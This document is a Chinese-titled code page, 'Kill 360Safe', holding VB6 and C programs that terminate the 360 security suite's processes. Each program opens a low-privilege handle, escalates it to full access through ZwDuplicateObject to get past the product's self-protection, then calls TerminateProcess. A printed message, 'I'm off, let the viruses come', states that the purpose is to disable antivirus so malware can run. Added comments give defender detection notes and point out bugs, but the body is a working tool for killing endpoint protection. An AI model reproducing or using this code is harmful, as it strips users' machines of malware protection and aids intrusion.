Kill 360Safe 完整版(VB版)
Option Explicit
' API imports used by FcOpenProcess and Command1_Click below.
'
' TerminateProcess (kernel32): ends the process referred to by hProcess with exit code uExitCode.
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
' ZwDuplicateObject (ntdll): native handle-duplication call. It produces a new handle to the
' object behind SourceHandle, with the rights given in DesiredAccess, written through TargetHandle.
' Defender note: duplication is a second way to obtain a process handle, separate from OpenProcess.
' Self-protection that filters only process-open requests never sees the rights requested here.
' Kernel callbacks registered with ObRegisterCallbacks can filter both operations
' (OB_OPERATION_HANDLE_CREATE and OB_OPERATION_HANDLE_DUPLICATE).
Private Declare Function ZwDuplicateObject _
Lib "NTDLL.DLL" (ByVal SourceProcessHandle As Long, _
ByVal SourceHandle As Long, _
ByVal TargetProcessHandle As Long, _
ByRef TargetHandle As Long, _
ByVal DesiredAccess As Long, _
ByVal HandleAttributes As Long, _
ByVal Options As Long) As Long
' OpenProcess (kernel32): opens the process with id dwProcessID and the rights in dwDesiredAccess.
' Returns 0 on failure.
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
' Returns a handle value for the process with id p, or 0 when OpenProcess fails
' (the result is never assigned in that case, so it keeps the Long default of 0).
'
' Steps visible here:
'   1. OpenProcess is called with access mask &H400 (PROCESS_QUERY_INFORMATION).
'   2. ZwDuplicateObject is called with -1 (the current-process pseudo-handle) as both source
'      and target process, requested access &H1F0FFF (the PROCESS_ALL_ACCESS value from
'      pre-Vista SDKs) and Options = 1 (DUPLICATE_CLOSE_SOURCE).
' Presumably the aim is to ask for a low-privilege handle first and request the full rights
' only through duplication; the page title names 360Safe as the product this is aimed at.
'
' NOTE(review): Rtn (the NTSTATUS result) is never inspected, so the caller cannot tell whether
' the duplication succeeded or which rights the returned value actually carries.
' Defender note: a low-rights open of a security product's process followed by a duplication
' requesting terminate/all-access rights is the pattern to monitor and to strip rights from.
Function FcOpenProcess&(p&)
Dim ProcessHandle As Long
Dim Rtn As Long
ProcessHandle = OpenProcess(&H400, 0, p)
If ProcessHandle <> 0 Then
Rtn = ZwDuplicateObject(-1, ProcessHandle, -1, VarPtr(ProcessHandle), &H1F0FFF, 0, 1)
FcOpenProcess = ProcessHandle
End If
End Function
' Click handler: obtains a handle for the hard-coded PID 1884 through FcOpenProcess and passes
' it to TerminateProcess with exit code 0.
'
' NOTE(review): FcOpenProcess returns 0 on failure and that value is passed on unchecked.
' The TerminateProcess result is ignored and the handle is never closed.
' Defender note: unexpected termination of an endpoint-protection process is a high-signal event.
' Alert on the product's process exiting without a matching service stop or update.
Private Sub Command1_Click()
Dim ProcessHandle As Long
ProcessHandle = FcOpenProcess&(1884)
TerminateProcess ProcessHandle, 0
End Sub
1884 是进程的 PID;使用时需要先完成从进程名到 PID 的转换!
#include
#include
#include
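/*
 * Look up a process ID by executable image name.
 *
 * Walks a Toolhelp process snapshot and returns the th32ProcessID of the first
 * entry whose szExeFile equals pn exactly (case-sensitive strcmp, as before).
 *
 * Parameters:
 *   pn - NUL-terminated image name to look for; NULL is treated as "not found".
 *
 * Returns the matching process ID, or 0 when pn is NULL, the snapshot cannot be
 * created, or no entry matches.
 *
 * Matching is by image base name only. A name is not proof of which binary is
 * running, so callers that need identity must verify the image path or its
 * signature separately.
 */
unsigned long getprocid(char *pn)
{
    PROCESSENTRY32 pe;
    HANDLE hnd;
    unsigned long pid = 0;
    BOOL b;

    if (pn == NULL)
        return 0;

    hnd = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hnd == INVALID_HANDLE_VALUE)
        return 0;

    /* dwSize must be set before Process32First, otherwise the call fails. */
    pe.dwSize = sizeof(pe);
    for (b = Process32First(hnd, &pe); b; b = Process32Next(hnd, &pe)) {
        if (strcmp(pn, pe.szExeFile) == 0) {
            pid = pe.th32ProcessID;
            break;
        }
    }

    /* The original returned from inside the loop and never released the snapshot. */
    CloseHandle(hnd);
    return pid;
}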
// Entry point. It resolves ZwDuplicateObject from ntdll.dll at run time and looks up the PID of
// "safeboxTray.exe". It opens that process with PROCESS_DUP_HANDLE only, calls ZwDuplicateObject
// on the resulting handle and passes the result to TerminateProcess.
//
// Returns 1 whenever OpenProcess yields a non-NULL handle (whether or not the later calls
// succeed), otherwise 0.
//
// Defender notes:
//  - Handle duplication is a separate path to a process handle from OpenProcess. Self-protection
//    has to filter both, e.g. ObRegisterCallbacks covering OB_OPERATION_HANDLE_CREATE and
//    OB_OPERATION_HANDLE_DUPLICATE, or running the service as a protected process (PPL).
//  - Process-access telemetry (e.g. Sysmon Event ID 10) on the product's process can surface the
//    initial low-rights open. Unexpected exit of the product's process should alert.
int main()
{
HMODULE hNTDLL = GetModuleHandle("ntdll.dll");
// Pointer is declared as returning void, so the NTSTATUS result cannot be inspected below.
void (WINAPI *ZwDuplicateObject) (DWORD,HANDLE,DWORD,PHANDLE,unsigned long,unsigned long,unsigned long);
// NOTE(review): the GetProcAddress result is not checked before the pointer is called.
(FARPROC&)ZwDuplicateObject= GetProcAddress(hNTDLL,"ZwDuplicateObject");
DWORD pid=0;
pid=getprocid("safeboxTray.exe");
if(pid==0)
{
// Message text: "Cannot find the process ID of the 360 safebox".
// NOTE(review): execution continues after this message; OpenProcess is still called with pid 0.
printf("找不到360保险箱的进程ID");
}
HANDLE ProcessHandle=OpenProcess(PROCESS_DUP_HANDLE,FALSE,pid);
if(ProcessHandle != NULL)
{
// -1 for both process arguments is the current-process pseudo-handle. 2035711 is 0x1F0FFF
// (the PROCESS_ALL_ACCESS value from pre-Vista SDKs). The final 1 is DUPLICATE_CLOSE_SOURCE.
ZwDuplicateObject(-1,ProcessHandle,-1,&ProcessHandle,2035711,0,1);
// NOTE(review): the TerminateProcess result is ignored and the handle is never closed.
TerminateProcess(ProcessHandle,0);
// Message text: "I'm off, let the viruses come".
printf("我走了,毒来吧\n");
return 1;
}
// Message text: "It has been upgraded". Presumably this means the target was updated and the
// open was refused.
printf("升级了\n");
return 0;
}